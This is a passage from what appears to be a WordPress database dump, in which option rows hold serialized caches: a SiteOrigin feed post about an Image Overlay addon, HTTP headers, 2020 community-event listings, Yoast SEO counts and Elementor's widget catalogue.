beautiful, customizable hover text overlays with animations to your images. Great for galleries, portfolios or any image that would benefit from displaying information on hover.</p>\n<p>SiteOrigin Premium version <code>1.8</code> introduces the Image Overlay addon. Once you&#8217;ve updated, head over to <span class=\"adminized-section\"><span class=\"adminized-part\">WP Admin: SiteOrigin Premium</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Premium Addons</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Image Overlay</span></span> to activate and view the global settings.</p>\n<p><a href=\"https://demo.siteorigin.com/premium/image-overlay/\" target=\"_blank\" rel=\"noopener noreferrer\">View the demo</a>.<br />\n<a href=\"https://siteorigin.com/premium-documentation/plugin-addons/image-overlay/\">View the documentation</a>.</p>\n<p>Support has been provided for the SiteOrigin Image, Image Grid, and Simple Masonry widgets. Overlays can be deployed in seconds using the predefined light/dark themes or fully customized using the wide array of style and animation options provided in the global addon settings. Overlay text is provided by the Media Library image title or the widget image title.</p>\n<div id=\"attachment_172355\" style=\"width: 2290px\" class=\"wp-caption alignnone\"><img aria-describedby=\"caption-attachment-172355\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/04/overlay-dark-masonry.jpg\" alt=\"\" width=\"2280\" height=\"1140\" class=\"size-full wp-image-172355\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/04/overlay-dark-masonry.jpg 2280w, https://siteorigin.com/wp-content/uploads/2019/04/overlay-dark-masonry-300x150.jpg 300w, https://siteorigin.com/wp-content/uploads/2019/04/overlay-dark-masonry-768x384.jpg 768w, https://siteorigin.com/wp-content/uploads/2019/04/overlay-dark-masonry-699x350.jpg 699w, https://siteorigin.com/wp-content/uploads/2019/04/overlay-dark-masonry-1050x525.jpg 1050w, https://siteorigin.com/wp-content/uploads/2019/04/overlay-dark-masonry-313x157.jpg 313w\" sizes=\"(max-width: 2280px) 100vw, 2280px\" /></p>\n<p id=\"caption-attachment-172355\" class=\"wp-caption-text\">An example of the dark overlay theme used in the Simple Masonry widget.</p>\n</div>\n<h3>Do More with SiteOrigin Premium</h3>\n<p><a href=\"https://siteorigin.com/downloads/premium/\">SiteOrigin Premium</a> offers a huge array of additional functionality for Page Builder, the Widgets Bundle and all of our themes. Enhance your layouts with the Image Overlay and 17 other powerful addons.</p>\n<p>If you&#8217;ve built something awesome with the Image Overlay addon and would like to share it, feel free to let us know in the comments section below.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/announcing-the-image-overlay-addon/\">Announcing the Image Overlay Addon</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://siteorigin.com/announcing-the-image-overlay-addon/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"8\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:28:\"https://siteorigin.com/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"\n	hourly	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"\n	1	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:19:{s:4:\"date\";s:29:\"Fri, 30 Oct 2020 18:17:24 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";s:10:\"set-cookie\";s:145:\"__cfduid=deb51a870837abd36a2f7607e8b0ae16f1604081844; expires=Sun, 29-Nov-20 18:17:24 GMT; path=/; domain=.siteorigin.com; HttpOnly; SameSite=Lax\";s:12:\"x-powered-by\";s:10:\"PHP/7.0.31\";s:13:\"cache-control\";s:14:\"max-age=432000\";s:7:\"expires\";s:10:\"1604090380\";s:4:\"link\";s:59:\"<https://siteorigin.com/wp-json/>; rel=\"https://api.w.org/\"\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:13:\"last-modified\";s:29:\"Fri, 30 Oct 2020 11:30:47 GMT\";s:4:\"etag\";s:41:\"W/\"23d4aa3207490971b98deee9d32ca945-gzip\"\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:15:\"cf-cache-status\";s:3:\"HIT\";s:3:\"age\";s:4:\"5864\";s:13:\"cf-request-id\";s:32:\"061c53989a0000e718193df000000001\";s:9:\"expect-ct\";s:87:\"max-age=604800, report-uri=\"https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct\"\";s:9:\"report-to\";s:225:\"{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report?s=Ufy5ofchTwjJ%2F2lpkX5ids6igZZ9FCHPqviIRt0uxCYo9E0kHPYkOQwUy60xF%2Fw0Qh3iHktLlVYnhFsAl1%2F%2Fl104WeTSkR%2FO37xhGdT9%2FQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\";s:3:\"nel\";s:39:\"{\"report_to\":\"cf-nel\",\"max_age\":604800}\";s:6:\"server\";s:10:\"cloudflare\";s:6:\"cf-ray\";s:20:\"5ea722075bb3e718-EWR\";}}s:5:\"build\";s:14:\"20200501235608\";}','no'),(62198,'_transient_timeout_feed_mod_2dd0202377a060f0df35cceaacc2c13c','1604125044','no'),(62199,'_transient_feed_mod_2dd0202377a060f0df35cceaacc2c13c','1604081844','no'),(62200,'_transient_timeout_wpforms_dash_widget_lite_entries_by_form','1604120401','no'),(62201,'_transient_wpforms_dash_widget_lite_entries_by_form','a:1:{i:613;a:3:{s:7:\"form_id\";i:613;s:5:\"count\";i:333;s:5:\"title\";s:20:\"Website contact form\";}}','no'),(62202,'_site_transient_timeout_community-events-e6bb175831e2d4a50f590f6b1c074fd7','1604125055','no'),(62203,'_site_transient_community-events-e6bb175831e2d4a50f590f6b1c074fd7','a:4:{s:9:\"sandboxed\";b:0;s:5:\"error\";N;s:8:\"location\";a:1:{s:2:\"ip\";s:12:\"47.203.137.0\";}s:6:\"events\";a:7:{i:0;a:10:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:64:\"Discussion group: Organizing WordPress Meetups - Getting Started\";s:3:\"url\";s:68:\"https://www.meetup.com/learn-wordpress-discussions/events/274203124/\";s:6:\"meetup\";s:27:\"Learn WordPress Discussions\";s:10:\"meetup_url\";s:51:\"https://www.meetup.com/learn-wordpress-discussions/\";s:4:\"date\";s:19:\"2020-11-02 05:00:00\";s:8:\"end_date\";s:19:\"2020-11-02 06:00:00\";s:20:\"start_unix_timestamp\";i:1604322000;s:18:\"end_unix_timestamp\";i:1604325600;s:8:\"location\";a:4:{s:8:\"location\";s:6:\"Online\";s:7:\"country\";s:2:\"US\";s:8:\"latitude\";d:37.7799987792970028976924368180334568023681640625;s:9:\"longitude\";d:-122.419998168950002082056016661226749420166015625;}}i:1;a:10:{s:4:\"type\";s:8:\"wordcamp\";s:5:\"title\";s:23:\"WordCamp Finland Online\";s:3:\"url\";s:34:\"https://finland.wordcamp.org/2020/\";s:6:\"meetup\";N;s:10:\"meetup_url\";N;s:4:\"date\";s:19:\"2020-11-12 00:00:00\";s:8:\"end_date\";s:19:\"2020-11-12 00:00:00\";s:20:\"start_unix_timestamp\";i:1605132000;s:18:\"end_unix_timestamp\";i:1605132000;s:8:\"location\";a:4:{s:8:\"location\";s:6:\"Online\";s:7:\"country\";s:2:\"FI\";s:8:\"latitude\";d:61.9241099999999988767740433104336261749267578125;s:9:\"longitude\";d:25.748151100000001179068931378424167633056640625;}}i:2;a:10:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:36:\"NO MEETUP: Election Night - GO VOTE!\";s:3:\"url\";s:68:\"https://www.meetup.com/WordPress-St-Petersburg/events/wqcnjrybcpbwb/\";s:6:\"meetup\";s:24:\"WordPress St. Petersburg\";s:10:\"meetup_url\";s:47:\"https://www.meetup.com/WordPress-St-Petersburg/\";s:4:\"date\";s:19:\"2020-11-03 18:30:00\";s:8:\"end_date\";s:19:\"2020-11-03 20:30:00\";s:20:\"start_unix_timestamp\";i:1604446200;s:18:\"end_unix_timestamp\";i:1604453400;s:8:\"location\";a:4:{s:8:\"location\";s:6:\"Online\";s:7:\"country\";s:2:\"US\";s:8:\"latitude\";d:27.7700004577639987246584496460855007171630859375;s:9:\"longitude\";d:-82.6399993896479969635038287378847599029541015625;}}i:3;a:10:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:31:\"To be announced: Scheduled Talk\";s:3:\"url\";s:60:\"https://www.meetup.com/WordPress-Tampa/events/zrtjgrybcpbgb/\";s:6:\"meetup\";s:15:\"WordPress Tampa\";s:10:\"meetup_url\";s:39:\"https://www.meetup.com/WordPress-Tampa/\";s:4:\"date\";s:19:\"2020-11-04 18:30:00\";s:8:\"end_date\";s:19:\"2020-11-04 20:00:00\";s:20:\"start_unix_timestamp\";i:1604532600;s:18:\"end_unix_timestamp\";i:1604538000;s:8:\"location\";a:4:{s:8:\"location\";s:14:\"Tampa, FL, USA\";s:7:\"country\";s:2:\"us\";s:8:\"latitude\";d:27.930707931518998776709850062616169452667236328125;s:9:\"longitude\";d:-82.508712768555000138803734444081783294677734375;}}i:4;a:10:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:42:\"WordPress Collaboration Meetup ONLINE ONLY\";s:3:\"url\";s:70:\"https://www.meetup.com/West-Orlando-WordPress-Meetup/events/274002006/\";s:6:\"meetup\";s:29:\"West Orlando WordPress Meetup\";s:10:\"meetup_url\";s:53:\"https://www.meetup.com/West-Orlando-WordPress-Meetup/\";s:4:\"date\";s:19:\"2020-11-06 10:00:00\";s:8:\"end_date\";s:19:\"2020-11-06 11:30:00\";s:20:\"start_unix_timestamp\";i:1604674800;s:18:\"end_unix_timestamp\";i:1604680200;s:8:\"location\";a:4:{s:8:\"location\";s:6:\"Online\";s:7:\"country\";s:2:\"US\";s:8:\"latitude\";d:28.530000686646001639701353269629180431365966796875;s:9:\"longitude\";d:-81.589996337890994482222595252096652984619140625;}}i:5;a:10:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:30:\"TBA: Regular WordPress Meeting\";s:3:\"url\";s:69:\"https://www.meetup.com/Brandon-WordPress-Meetup/events/vxlxzqybcpbmb/\";s:6:\"meetup\";s:24:\"Brandon WordPress Meetup\";s:10:\"meetup_url\";s:48:\"https://www.meetup.com/Brandon-WordPress-Meetup/\";s:4:\"date\";s:19:\"2020-11-09 19:00:00\";s:8:\"end_date\";s:19:\"2020-11-09 21:00:00\";s:20:\"start_unix_timestamp\";i:1604966400;s:18:\"end_unix_timestamp\";i:1604973600;s:8:\"location\";a:4:{s:8:\"location\";s:16:\"Valrico, FL, USA\";s:7:\"country\";s:2:\"us\";s:8:\"latitude\";d:27.894544601439999809144865139387547969818115234375;s:9:\"longitude\";d:-82.2524337768549997917943983338773250579833984375;}}i:6;a:10:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:55:\"Ask Us Anything: WordPress Support Crowdsourcing Meetup\";s:3:\"url\";s:68:\"https://www.meetup.com/WordPress-St-Petersburg/events/nrcnjrybcpbfb/\";s:6:\"meetup\";s:24:\"WordPress St. Petersburg\";s:10:\"meetup_url\";s:47:\"https://www.meetup.com/WordPress-St-Petersburg/\";s:4:\"date\";s:19:\"2020-11-17 18:30:00\";s:8:\"end_date\";s:19:\"2020-11-17 20:30:00\";s:20:\"start_unix_timestamp\";i:1605655800;s:18:\"end_unix_timestamp\";i:1605663000;s:8:\"location\";a:4:{s:8:\"location\";s:6:\"Online\";s:7:\"country\";s:2:\"US\";s:8:\"latitude\";d:27.7700004577639987246584496460855007171630859375;s:9:\"longitude\";d:-82.6399993896479969635038287378847599029541015625;}}}}','no'),(62204,'_transient_timeout_wpseo-statistics-totals','1604168256','no'),(62205,'_transient_wpseo-statistics-totals','a:1:{i:1;a:2:{s:6:\"scores\";a:1:{i:0;a:4:{s:8:\"seo_rank\";s:2:\"na\";s:5:\"label\";s:48:\"Posts <strong>without</strong> a focus keyphrase\";s:5:\"count\";i:1;s:4:\"link\";s:100:\"https://ashbyresort.com/wp-admin/edit.php?post_status=publish&#038;post_type=post&#038;seo_filter=na\";}}s:8:\"division\";a:5:{s:3:\"bad\";i:0;s:2:\"ok\";i:0;s:4:\"good\";i:0;s:2:\"na\";i:1;s:7:\"noindex\";i:0;}}}','no'),(62209,'_transient_timeout_elementor_remote_info_api_data_3.0.12','1604125113','no'),(62210,'_transient_elementor_remote_info_api_data_3.0.12','a:4:{s:9:\"timestamp\";s:10:\"1604079803\";s:14:\"upgrade_notice\";a:3:{s:7:\"version\";s:5:\"2.0.0\";s:7:\"message\";s:0:\"\";s:11:\"update_link\";s:0:\"\";}s:11:\"pro_widgets\";a:59:{i:0;a:4:{s:4:\"name\";s:5:\"posts\";s:5:\"title\";s:5:\"Posts\";s:4:\"icon\";s:15:\"eicon-post-list\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:1;a:4:{s:4:\"name\";s:9:\"portfolio\";s:5:\"title\";s:9:\"Portfolio\";s:4:\"icon\";s:18:\"eicon-gallery-grid\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:2;a:4:{s:4:\"name\";s:7:\"gallery\";s:5:\"title\";s:7:\"Gallery\";s:4:\"icon\";s:23:\"eicon-gallery-justified\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:3;a:4:{s:4:\"name\";s:4:\"form\";s:5:\"title\";s:4:\"Form\";s:4:\"icon\";s:21:\"eicon-form-horizontal\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:4;a:4:{s:4:\"name\";s:5:\"login\";s:5:\"title\";s:5:\"Login\";s:4:\"icon\";s:15:\"eicon-lock-user\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:5;a:4:{s:4:\"name\";s:6:\"slides\";s:5:\"title\";s:6:\"Slides\";s:4:\"icon\";s:12:\"eicon-slides\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:6;a:4:{s:4:\"name\";s:8:\"nav-menu\";s:5:\"title\";s:8:\"Nav Menu\";s:4:\"icon\";s:14:\"eicon-nav-menu\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:7;a:4:{s:4:\"name\";s:17:\"animated-headline\";s:5:\"title\";s:17:\"Animated Headline\";s:4:\"icon\";s:23:\"eicon-animated-headline\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:8;a:4:{s:4:\"name\";s:10:\"price-list\";s:5:\"title\";s:10:\"Price List\";s:4:\"icon\";s:16:\"eicon-price-list\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:9;a:4:{s:4:\"name\";s:11:\"price-table\";s:5:\"title\";s:11:\"Price Table\";s:4:\"icon\";s:17:\"eicon-price-table\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:10;a:4:{s:4:\"name\";s:8:\"flip-box\";s:5:\"title\";s:8:\"Flip Box\";s:4:\"icon\";s:14:\"eicon-flip-box\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:11;a:4:{s:4:\"name\";s:14:\"call-to-action\";s:5:\"title\";s:14:\"Call to Action\";s:4:\"icon\";s:20:\"eicon-image-rollover\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:12;a:4:{s:4:\"name\";s:14:\"media-carousel\";s:5:\"title\";s:14:\"Media Carousel\";s:4:\"icon\";s:20:\"eicon-media-carousel\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:13;a:4:{s:4:\"name\";s:20:\"testimonial-carousel\";s:5:\"title\";s:20:\"Testimonial Carousel\";s:4:\"icon\";s:26:\"eicon-testimonial-carousel\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:14;a:4:{s:4:\"name\";s:7:\"reviews\";s:5:\"title\";s:7:\"Reviews\";s:4:\"icon\";s:12:\"eicon-review\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:15;a:4:{s:4:\"name\";s:17:\"table-of-contents\";s:5:\"title\";s:17:\"Table of Contents\";s:4:\"icon\";s:23:\"eicon-table-of-contents\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:16;a:4:{s:4:\"name\";s:9:\"countdown\";s:5:\"title\";s:9:\"Countdown\";s:4:\"icon\";s:15:\"eicon-countdown\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:17;a:4:{s:4:\"name\";s:13:\"share-buttons\";s:5:\"title\";s:13:\"Share Buttons\";s:4:\"icon\";s:11:\"eicon-share\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:18;a:4:{s:4:\"name\";s:11:\"search-form\";s:5:\"title\";s:11:\"Search Form\";s:4:\"icon\";s:17:\"eicon-site-search\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:19;a:4:{s:4:\"name\";s:10:\"author-box\";s:5:\"title\";s:10:\"Author Box\";s:4:\"icon\";s:12:\"eicon-person\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:20;a:4:{s:4:\"name\";s:13:\"post-comments\";s:5:\"title\";s:13:\"Post Comments\";s:4:\"icon\";s:14:\"eicon-comments\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:21;a:4:{s:4:\"name\";s:15:\"post-navigation\";s:5:\"title\";s:15:\"Post Navigation\";s:4:\"icon\";s:21:\"eicon-post-navigation\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:22;a:4:{s:4:\"name\";s:9:\"post-info\";s:5:\"title\";s:9:\"Post Info\";s:4:\"icon\";s:15:\"eicon-post-info\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:23;a:4:{s:4:\"name\";s:7:\"sitemap\";s:5:\"title\";s:7:\"Sitemap\";s:4:\"icon\";s:13:\"eicon-sitemap\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:24;a:4:{s:4:\"name\";s:11:\"breadcrumbs\";s:5:\"title\";s:11:\"Breadcrumbs\";s:4:\"icon\";s:11:\"eicon-yoast\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:25;a:4:{s:4:\"name\";s:10:\"blockquote\";s:5:\"title\";s:10:\"Blockquote\";s:4:\"icon\";s:16:\"eicon-blockquote\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:26;a:4:{s:4:\"name\";s:19:\"wc-archive-products\";s:5:\"title\";s:16:\"Archive Products\";s:4:\"icon\";s:14:\"eicon-products\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:27;a:4:{s:4:\"name\";s:31:\"woocommerce-archive-description\";s:5:\"title\";s:19:\"Archive Description\";s:4:\"icon\";s:25:\"eicon-product-description\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:28;a:4:{s:4:\"name\";s:20:\"woocommerce-products\";s:5:\"title\";s:8:\"Products\";s:4:\"icon\";s:14:\"eicon-products\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:29;a:4:{s:4:\"name\";s:22:\"woocommerce-breadcrumb\";s:5:\"title\";s:23:\"WooCommerce Breadcrumbs\";s:4:\"icon\";s:25:\"eicon-product-breadcrumbs\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:30;a:4:{s:4:\"name\";s:14:\"wc-add-to-cart\";s:5:\"title\";s:18:\"Custom Add To Cart\";s:4:\"icon\";s:17:\"eicon-woocommerce\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:31;a:4:{s:4:\"name\";s:11:\"wc-elements\";s:5:\"title\";s:17:\"WooCommerce Pages\";s:4:\"icon\";s:19:\"eicon-product-pages\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:32;a:4:{s:4:\"name\";s:13:\"wc-categories\";s:5:\"title\";s:18:\"Product Categories\";s:4:\"icon\";s:24:\"eicon-product-categories\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:33;a:4:{s:4:\"name\";s:21:\"woocommerce-menu-cart\";s:5:\"title\";s:9:\"Menu Cart\";s:4:\"icon\";s:10:\"eicon-cart\";s:10:\"categories\";s:41:\"[\"theme-elements\",\"woocommerce-elements\"]\";}i:34;a:4:{s:4:\"name\";s:25:\"woocommerce-product-title\";s:5:\"title\";s:13:\"Product Title\";s:4:\"icon\";s:19:\"eicon-product-title\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:35;a:4:{s:4:\"name\";s:26:\"woocommerce-product-images\";s:5:\"title\";s:14:\"Product Images\";s:4:\"icon\";s:20:\"eicon-product-images\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:36;a:4:{s:4:\"name\";s:25:\"woocommerce-product-price\";s:5:\"title\";s:13:\"Product Price\";s:4:\"icon\";s:19:\"eicon-product-price\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:37;a:4:{s:4:\"name\";s:31:\"woocommerce-product-add-to-cart\";s:5:\"title\";s:11:\"Add To Cart\";s:4:\"icon\";s:25:\"eicon-product-add-to-cart\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:38;a:4:{s:4:\"name\";s:26:\"woocommerce-product-rating\";s:5:\"title\";s:14:\"Product Rating\";s:4:\"icon\";s:20:\"eicon-product-rating\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:39;a:4:{s:4:\"name\";s:25:\"woocommerce-product-stock\";s:5:\"title\";s:13:\"Product Stock\";s:4:\"icon\";s:19:\"eicon-product-stock\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:40;a:4:{s:4:\"name\";s:24:\"woocommerce-product-meta\";s:5:\"title\";s:12:\"Product Meta\";s:4:\"icon\";s:18:\"eicon-product-meta\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:41;a:4:{s:4:\"name\";s:37:\"woocommerce-product-short-description\";s:5:\"title\";s:17:\"Short Description\";s:4:\"icon\";s:25:\"eicon-product-description\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:42;a:4:{s:4:\"name\";s:29:\"woocommerce-product-data-tabs\";s:5:\"title\";s:17:\"Product Data Tabs\";s:4:\"icon\";s:18:\"eicon-product-tabs\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:43;a:4:{s:4:\"name\";s:42:\"woocommerce-product-additional-information\";s:5:\"title\";s:22:\"Additional Information\";s:4:\"icon\";s:19:\" eicon-product-info\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:44;a:4:{s:4:\"name\";s:27:\"woocommerce-product-related\";s:5:\"title\";s:15:\"Product Related\";s:4:\"icon\";s:21:\"eicon-product-related\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:45;a:4:{s:4:\"name\";s:26:\"woocommerce-product-upsell\";s:5:\"title\";s:7:\"Upsells\";s:4:\"icon\";s:20:\"eicon-product-upsell\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:46;a:4:{s:4:\"name\";s:15:\"facebook-button\";s:5:\"title\";s:15:\"Facebook Button\";s:4:\"icon\";s:23:\"eicon-facebook-like-box\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:47;a:4:{s:4:\"name\";s:17:\"facebook-comments\";s:5:\"title\";s:17:\"Facebook Comments\";s:4:\"icon\";s:23:\"eicon-facebook-comments\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:48;a:4:{s:4:\"name\";s:14:\"facebook-embed\";s:5:\"title\";s:14:\"Facebook Embed\";s:4:\"icon\";s:14:\"eicon-fb-embed\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:49;a:4:{s:4:\"name\";s:13:\"facebook-page\";s:5:\"title\";s:13:\"Facebook Page\";s:4:\"icon\";s:13:\"eicon-fb-feed\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:50;a:4:{s:4:\"name\";s:8:\"template\";s:5:\"title\";s:8:\"Template\";s:4:\"icon\";s:19:\"eicon-document-file\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:51;a:4:{s:4:\"name\";s:15:\"theme-site-logo\";s:5:\"title\";s:9:\"Site Logo\";s:4:\"icon\";s:15:\"eicon-site-logo\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:52;a:4:{s:4:\"name\";s:16:\"theme-site-title\";s:5:\"title\";s:10:\"Site Title\";s:4:\"icon\";s:16:\"eicon-site-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:53;a:4:{s:4:\"name\";s:16:\"theme-page-title\";s:5:\"title\";s:10:\"Page Title\";s:4:\"icon\";s:19:\"eicon-archive-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:54;a:4:{s:4:\"name\";s:16:\"theme-post-title\";s:5:\"title\";s:10:\"Post Title\";s:4:\"icon\";s:16:\"eicon-post-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:55;a:4:{s:4:\"name\";s:18:\"theme-post-excerpt\";s:5:\"title\";s:12:\"Post Excerpt\";s:4:\"icon\";s:18:\"eicon-post-excerpt\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:56;a:4:{s:4:\"name\";s:25:\"theme-post-featured-image\";s:5:\"title\";s:14:\"Featured Image\";s:4:\"icon\";s:20:\"eicon-featured-image\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:57;a:4:{s:4:\"name\";s:19:\"theme-archive-title\";s:5:\"title\";s:13:\"Archive Title\";s:4:\"icon\";s:19:\"eicon-archive-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:58;a:4:{s:4:\"name\";s:13:\"archive-posts\";s:5:\"title\";s:13:\"Archive Posts\";s:4:\"icon\";s:19:\"eicon-archive-posts\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}}s:17:\"canary_deployment\";a:2:{s:11:\"plugin_info\";a:11:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:5:\"3.0.0\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.0.zip\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.png?rev=1427768\";s:2:\"1x\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.4\";s:12:\"requires_php\";s:3:\"5.6\";}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:3:{s:4:\"type\";s:8:\"language\";s:9:\"languages\";a:26:{i:0;s:5:\"he_IL\";i:1;s:5:\"en_GB\";i:2;s:5:\"en_NZ\";i:3;s:5:\"en_ZA\";i:4;s:5:\"en_AU\";i:5;s:5:\"en_CA\";i:6;s:5:\"sv_SE\";i:7;s:5:\"da_DK\";i:8;s:5:\"fr_FR\";i:9;s:5:\"nl_NL\";i:10;s:5:\"nb_NO\";i:11;s:5:\"de_AT\";i:12;s:2:\"fi\";i:13;s:5:\"it_IT\";i:14;s:5:\"nn_NO\";i:15;s:5:\"de_CH\";i:16;s:5:\"en_GB\";i:17;s:5:\"is_IS\";i:18;s:2:\"ga\";i:19;s:5:\"fr_BE\";i:20;s:5:\"nl_BE\";i:21;s:3:\"ast\";i:22;s:5:\"lb_LU\";i:23;s:5:\"es_ES\";i:24;s:5:\"pt_PT\";i:25;s:3:\"mlt\";}s:8:\"operator\";s:2:\"in\";}}}}}','no'),(62212,'_transient_timeout_metaslider_extra_analytics_data','1604168327','no'),(62213,'_transient_metaslider_extra_analytics_data','a:5:{s:17:\"has_pro_installed\";s:5:\"false\";s:17:\"cancelled_tour_on\";s:14:\"step_add_slide\";s:15:\"optin_user_info\";b:0;s:9:\"optin_via\";b:0;s:12:\"slider_count\";i:1;}','no'),(62219,'_site_transient_upda